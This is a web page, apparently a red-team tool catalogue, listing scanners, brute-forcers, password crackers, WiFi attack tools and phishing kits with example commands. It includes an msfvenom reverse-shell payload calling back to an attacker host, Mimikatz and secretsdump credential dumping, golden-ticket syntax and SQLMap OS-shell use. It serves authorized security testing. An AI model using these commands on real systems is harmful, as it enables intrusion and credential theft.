Red Team Toolkit
Nmap - Basic Network Scan
Perform basic network discovery and port scanning to identify live hosts and open ports on target networks.
Initial reconnaissance to discover active hosts on a network segment.
Command/Usage
nmap -sn 192.168.1.0/24 Installation
sudo apt install nmap (Kali/Debian) | brew install nmap (macOS) | Download from nmap.org (Windows)
Additional Examples
-
nmap -sS -p- 192.168.1.100 -
nmap -sV -sC -p 80,443,8080 10.0.0.50 -
nmap --script vuln 192.168.1.100 -
nmap -iL targets.txt -oN scan_results.txt -
nmap -sU -p 161 192.168.1.100
Common Options/Flags
Related Tools
Related Blog Posts
Nmap - Service Version Detection
Identify service versions and operating systems running on target hosts for vulnerability assessment.
Detailed enumeration of services and versions to identify potential vulnerabilities.
Command/Usage
nmap -sV -sC -A -T4 192.168.1.100 Installation
sudo apt install nmap
Additional Examples
-
nmap -sV -p 80,443,8080 192.168.1.100 -
nmap -sV --script=http-enum 192.168.1.100 -
nmap -O -sV 192.168.1.100
Related Tools
Masscan - Fast Port Scanner
Ultra-fast port scanner capable of scanning the entire internet in minutes. Ideal for large-scale network reconnaissance.
Rapidly scan large network ranges to identify open ports across many hosts.
Command/Usage
masscan -p1-65535 192.168.1.0/24 --rate=1000 Installation
sudo apt install masscan
Additional Examples
-
masscan -p80,443 10.0.0.0/8 --rate=10000 -
masscan -p1-1000 192.168.1.100 -oL results.txt -
masscan --top-ports 100 192.168.1.0/24
Common Options/Flags
Related Tools
References
Rustscan - Rust-Based Port Scanner
Fast and modern port scanner written in Rust. Scans ports quickly then pipes results to nmap for detailed analysis.
Combine speed of Rustscan with detailed nmap scanning for efficient reconnaissance.
Command/Usage
rustscan -a 192.168.1.0/24 -- -sV -sC Installation
cargo install rustscan | sudo apt install rustscan
Additional Examples
-
rustscan -a 192.168.1.100 -- -sV -
rustscan -a 192.168.1.0/24 -p 1-65535 -- -A -
rustscan -a targets.txt --ulimit 5000 -- -sC
Common Options/Flags
Related Tools
References
Feroxbuster - Directory Bruteforcing
Fast, recursive directory/file brute-forcing tool written in Rust. Ideal for discovering hidden web content.
Discover hidden directories, files, and endpoints on web applications.
Command/Usage
feroxbuster -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt Installation
cargo install feroxbuster | sudo apt install feroxbuster
Additional Examples
-
feroxbuster -u http://example.com -w wordlist.txt -x php,html,js -
feroxbuster -u http://example.com -w wordlist.txt --recursive --depth 3 -
feroxbuster -u http://example.com -w wordlist.txt -H 'Cookie: session=abc123'
Common Options/Flags
Related Tools
References
Gobuster - Directory/File Bruteforcing
Directory/file and DNS brute-forcing tool written in Go. Fast and efficient for web enumeration.
Brute-force directories and files on web servers to discover hidden content.
Command/Usage
gobuster dir -u http://192.168.1.100 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt Installation
go install github.com/OJ/gobuster/v3@latest | sudo apt install gobuster
Additional Examples
-
gobuster dir -u http://example.com -w wordlist.txt -x php,html -
gobuster dir -u http://example.com -w wordlist.txt -t 50 -
gobuster dns -d example.com -w subdomains.txt
Common Options/Flags
Related Tools
References
WhatWeb - Web Technology Detection
Identify web technologies including CMS, frameworks, web servers, and plugins by analyzing HTTP responses.
Fingerprint web technologies to identify potential vulnerabilities and attack vectors.
Command/Usage
whatweb http://192.168.1.100 Installation
sudo apt install whatweb | gem install whatweb
Additional Examples
-
whatweb -a 3 http://example.com -
whatweb --aggression 3 http://example.com -
whatweb -i targets.txt
Common Options/Flags
Related Tools
References
Nikto - Web Server Scanner
Comprehensive web server scanner that checks for dangerous files, outdated server software, and misconfigurations.
Identify web server vulnerabilities, misconfigurations, and dangerous files.
Command/Usage
nikto -h http://192.168.1.100 Installation
sudo apt install nikto
Additional Examples
-
nikto -h http://example.com -p 80,443 -
nikto -h http://example.com -C all -
nikto -h http://example.com -Tuning 1,2,3,4,5,6,7,8,9
Common Options/Flags
Related Tools
References
DIRB - Web Content Scanner
Web content scanner that searches for hidden files and directories using wordlists.
Discover hidden directories and files on web servers.
Command/Usage
dirb http://192.168.1.100 /usr/share/wordlists/dirb/common.txt Installation
sudo apt install dirb
Additional Examples
-
dirb http://example.com /usr/share/wordlists/dirb/common.txt -X .php -
dirb http://example.com /usr/share/wordlists/dirb/common.txt -a 'User-Agent: Custom' -
dirb http://example.com /usr/share/wordlists/dirb/common.txt -S
Common Options/Flags
Related Tools
References
WFuzz - Web Fuzzer
Web application brute-forcer that allows fuzzing of any HTTP parameter including headers, POST data, and authentication.
Fuzz web application parameters, directories, and endpoints to discover hidden functionality.
Command/Usage
wfuzz -w /usr/share/wordlists/wfuzz/general/common.txt http://192.168.1.100/FUZZ Installation
sudo apt install wfuzz | pip install wfuzz
Additional Examples
-
wfuzz -w wordlist.txt -H 'Cookie: session=FUZZ' http://example.com -
wfuzz -w wordlist.txt -d 'username=admin&password=FUZZ' http://example.com/login -
wfuzz -w wordlist.txt --hc 404 http://example.com/FUZZ
Common Options/Flags
Related Tools
References
FFuF - Fast Web Fuzzer
Fast web fuzzer written in Go. Ideal for directory/file bruteforcing, parameter fuzzing, and vhost discovery.
Rapidly fuzz web applications for directories, files, parameters, and subdomains.
Command/Usage
ffuf -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -u http://192.168.1.100/FUZZ Installation
go install github.com/ffuf/ffuf/v2@latest | sudo apt install ffuf
Additional Examples
-
ffuf -w wordlist.txt -u http://example.com/FUZZ -e .php,.html -
ffuf -w wordlist.txt -H 'Host: FUZZ.example.com' -u http://example.com -
ffuf -w wordlist.txt -X POST -d 'username=admin&password=FUZZ' -u http://example.com/login
Common Options/Flags
Related Tools
References
Metasploit Framework - Exploitation
Penetration testing framework for developing and executing exploit code against remote targets.
Exploit vulnerabilities, generate payloads, and perform post-exploitation activities.
Command/Usage
msfconsole Installation
sudo apt install metasploit-framework
Additional Examples
-
use exploit/windows/smb/ms17_010_eternalblue -
use auxiliary/scanner/smb/smb_version -
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.50 LPORT=4444 -f exe -o payload.exe
Common Options/Flags
Related Tools
Burp Suite - Web Application Testing
Integrated platform for performing security testing of web applications. Includes proxy, scanner, intruder, and repeater.
Intercept, analyze, and manipulate HTTP/HTTPS traffic for web application security testing.
Command/Usage
burpsuite Installation
Download from portswigger.net/burp/communitydownload
Additional Examples
-
Configure browser proxy to 127.0.0.1:8080 -
Use Intruder for parameter fuzzing -
Use Repeater to manually modify requests -
Use Scanner for automated vulnerability detection
Common Options/Flags
Related Tools
References
Hydra - Network Login Cracker
Fast network logon cracker supporting numerous protocols. Ideal for brute-forcing login credentials.
Brute-force login credentials for various protocols including SSH, FTP, HTTP, SMB, and more.
Command/Usage
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.1.100 ssh Installation
sudo apt install hydra
Additional Examples
-
hydra -l admin -P wordlist.txt 192.168.1.100 http-post-form '/login.php:user=^USER^&pass=^PASS^:Invalid' -
hydra -L users.txt -P passwords.txt 192.168.1.100 smb -
hydra -l admin -P wordlist.txt -s 2222 192.168.1.100 ssh
Common Options/Flags
Related Tools
References
John the Ripper - Password Cracker
Fast password cracker supporting hundreds of hash and cipher types. Can crack password hashes from various sources.
Crack password hashes from compromised systems, databases, or password dumps.
Command/Usage
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt Installation
sudo apt install john
Additional Examples
-
john --wordlist=wordlist.txt hash.txt -
john --format=raw-md5 hash.txt -
john --show hash.txt -
john --rules --wordlist=wordlist.txt hash.txt
Common Options/Flags
Related Tools
References
Hashcat - Advanced Password Recovery
World's fastest password recovery tool utilizing GPU acceleration. Supports 300+ hash types.
Crack password hashes using GPU acceleration for significantly faster recovery.
Command/Usage
hashcat -m 0 -a 0 hash.txt /usr/share/wordlists/rockyou.txt Installation
sudo apt install hashcat
Additional Examples
-
hashcat -m 1000 -a 0 hash.txt wordlist.txt -
hashcat -m 0 -a 3 hash.txt ?a?a?a?a?a?a -
hashcat -m 1000 -a 1 hash.txt wordlist1.txt wordlist2.txt
Common Options/Flags
Related Tools
References
Mimikatz - Credential Extraction
Tool to extract plaintext passwords, hash, PIN code and kerberos tickets from memory.
Extract credentials from Windows memory after gaining initial access.
Command/Usage
mimikatz.exe Installation
Download from github.com/gentilkiwi/mimikatz
Additional Examples
-
privilege::debug -
sekurlsa::logonpasswords -
lsadump::sam -
kerberos::golden /user:admin /domain:example.com /sid:S-1-5-21-... /krbtgt:hash
Common Options/Flags
Related Tools
References
BloodHound - Active Directory Mapping
Visualize Active Directory attack paths and identify privilege escalation opportunities.
Map Active Directory relationships to find attack paths for privilege escalation and lateral movement.
Command/Usage
bloodhound Installation
sudo apt install bloodhound | Download from github.com/BloodHoundAD/BloodHound
Additional Examples
-
bloodhound-python -d example.com -u user -p password -gc dc.example.com -c all -
SharpHound.exe -c All -d example.com -
Import data into BloodHound GUI and query for attack paths
Common Options/Flags
Related Tools
References
Impacket - Network Protocol Tools
Collection of Python classes for working with network protocols. Includes tools for SMB, MSRPC, LDAP, and more.
Perform various Active Directory attacks including AS-REP roasting, DCSync, and pass-the-hash.
Command/Usage
impacket-GetNPUsers example.com/user:password Installation
pip install impacket | sudo apt install impacket-scripts
Additional Examples
-
impacket-GetNPUsers example.com/user:password -dc-ip 10.0.0.1 -
impacket-secretsdump example.com/user:password@10.0.0.1 -
impacket-psexec example.com/user:password@10.0.0.1 -
impacket-smbserver share /tmp/share
Common Options/Flags
Related Tools
References
Aircrack-ng - WiFi Security Auditing
Complete suite of tools to assess WiFi network security including packet capture, WEP/WPA cracking, and deauthentication.
Audit WiFi network security by capturing handshakes and cracking WPA/WPA2 passwords.
Command/Usage
aircrack-ng -w /usr/share/wordlists/rockyou.txt capture.cap Installation
sudo apt install aircrack-ng
Additional Examples
-
airmon-ng start wlan0 -
airodump-ng wlan0mon -
aireplay-ng --deauth 10 -a BSSID wlan0mon -
aircrack-ng -w wordlist.txt capture.cap
Common Options/Flags
Related Tools
References
Reaver - WPS Attack Tool
Brute-force attack tool against WiFi Protected Setup (WPS) to recover WPA/WPA2 passphrases.
Exploit WPS vulnerabilities to recover WiFi passwords on vulnerable routers.
Command/Usage
reaver -i wlan0mon -b BSSID -vv Installation
sudo apt install reaver
Additional Examples
-
reaver -i wlan0mon -b 00:11:22:33:44:55 -vv -
reaver -i wlan0mon -b BSSID -c 6 -vv -
reaver -i wlan0mon -b BSSID -L -N -d 15 -T .5 -vv
Common Options/Flags
Related Tools
References
Social Engineering Toolkit (SET)
Open-source penetration testing framework designed for social engineering attacks including phishing and credential harvesting.
Create convincing phishing campaigns, credential harvesting pages, and social engineering attacks.
Command/Usage
setoolkit Installation
sudo apt install set
Additional Examples
-
Select: 1) Social-Engineering Attacks -
Select: 2) Website Attack Vectors -
Select: 3) Credential Harvester Attack Method -
Select: 2) Site Cloner
Common Options/Flags
Related Tools
Nmap - Vulnerability Scanning
Use Nmap's vulnerability detection scripts to identify known security issues on target systems.
Identify known vulnerabilities including CVEs, misconfigurations, and security weaknesses.
Command/Usage
nmap --script vuln 192.168.1.100 Installation
sudo apt install nmap
Additional Examples
-
nmap --script vuln -p 80,443 192.168.1.100 -
nmap --script vuln --script-args=unsafe=1 192.168.1.100 -
nmap --script 'vuln and safe' 192.168.1.100
Common Options/Flags
Related Tools
References
SQLMap - SQL Injection Tool
Automated tool for detecting and exploiting SQL injection flaws. Can dump databases and execute commands.
Automate SQL injection detection and exploitation to extract data from vulnerable databases.
Command/Usage
sqlmap -u 'http://192.168.1.100/page.php?id=1' --dbs Installation
sudo apt install sqlmap | pip install sqlmap
Additional Examples
-
sqlmap -u 'http://example.com/page.php?id=1' --dbs -
sqlmap -u 'http://example.com/page.php?id=1' -D database -T users --dump -
sqlmap -r request.txt --batch -
sqlmap -u 'http://example.com/page.php?id=1' --os-shell
Common Options/Flags
Related Tools
References
theHarvester - OSINT Gathering
Gather emails, subdomains, hosts, employee names, open ports and banners from different public sources.
Perform OSINT reconnaissance to gather information about target organizations and domains.
Command/Usage
theHarvester -d example.com -b all Installation
sudo apt install theharvester | pip install theHarvester
Additional Examples
-
theHarvester -d example.com -b google -
theHarvester -d example.com -b all -l 500 -
theHarvester -d example.com -b linkedin -
theHarvester -d example.com -b shodan
Common Options/Flags
Related Tools
References
Sublist3r - Subdomain Enumeration
Fast subdomain enumeration tool that uses search engines and DNS records to discover subdomains.
Discover subdomains of target domains for broader attack surface identification.
Command/Usage
sublist3r -d example.com Installation
pip install sublist3r | sudo apt install sublist3r
Additional Examples
-
sublist3r -d example.com -
sublist3r -d example.com -t 10 -
sublist3r -d example.com -b -
sublist3r -d example.com -p 80,443
Common Options/Flags
Related Tools
References
Enum4linux - SMB Enumeration
Tool for enumerating information from Windows and Samba systems including users, shares, and groups.
Enumerate SMB shares, users, groups, and password policies on Windows/Samba systems.
Command/Usage
enum4linux -a 192.168.1.100 Installation
sudo apt install enum4linux
Additional Examples
-
enum4linux -a 192.168.1.100 -
enum4linux -U 192.168.1.100 -
enum4linux -S 192.168.1.100 -
enum4linux -P 192.168.1.100
Common Options/Flags
Related Tools
SMBClient - SMB Share Access
Command-line SMB client for accessing Windows shares, listing directories, and transferring files.
Access and enumerate SMB shares, download files, and interact with Windows file shares.
onesixtyone - SNMP Scanner
Fast SNMP community string brute-forcing tool. Efficiently tests multiple community strings against SNMP-enabled devices.
Identify valid SNMP community strings on target systems to enable further enumeration and credential disclosure.
Command/Usage
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.100 Installation
sudo apt install onesixtyone
Additional Examples
-
onesixtyone -c community.txt 192.168.1.100 -
onesixtyone -c /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt 192.168.1.0/24 -
onesixtyone -c community.txt -i hosts.txt -
onesixtyone public 192.168.1.100
Common Options/Flags
Related Tools
Related Blog Posts
snmpwalk - SNMP MIB Walker
Part of Net-SNMP tools suite. Walks the SNMP Management Information Base (MIB) tree to retrieve system information, configuration data, and potentially exposed credentials.
Enumerate SNMP-exposed data including system descriptions, contact information, and misconfigurations that may leak credentials.
Command/Usage
snmpwalk -v2c -c public 192.168.1.100 Installation
sudo apt install snmp (Debian/Kali) | brew install net-snmp (macOS) | Download from net-snmp.org (Windows)
Additional Examples
-
snmpwalk -v2c -c public 192.168.1.100 -
snmpwalk -v2c -c public 192.168.1.100 system -
snmpwalk -v2c -c public 192.168.1.100 iso.3.6.1.2.1.1 -
snmpwalk -v3 -l authPriv -u snmpuser -a SHA -A authpass -x AES -X privpass 192.168.1.100
Common Options/Flags
Related Tools
Related Blog Posts
No tools found
Try adjusting your filters or search terms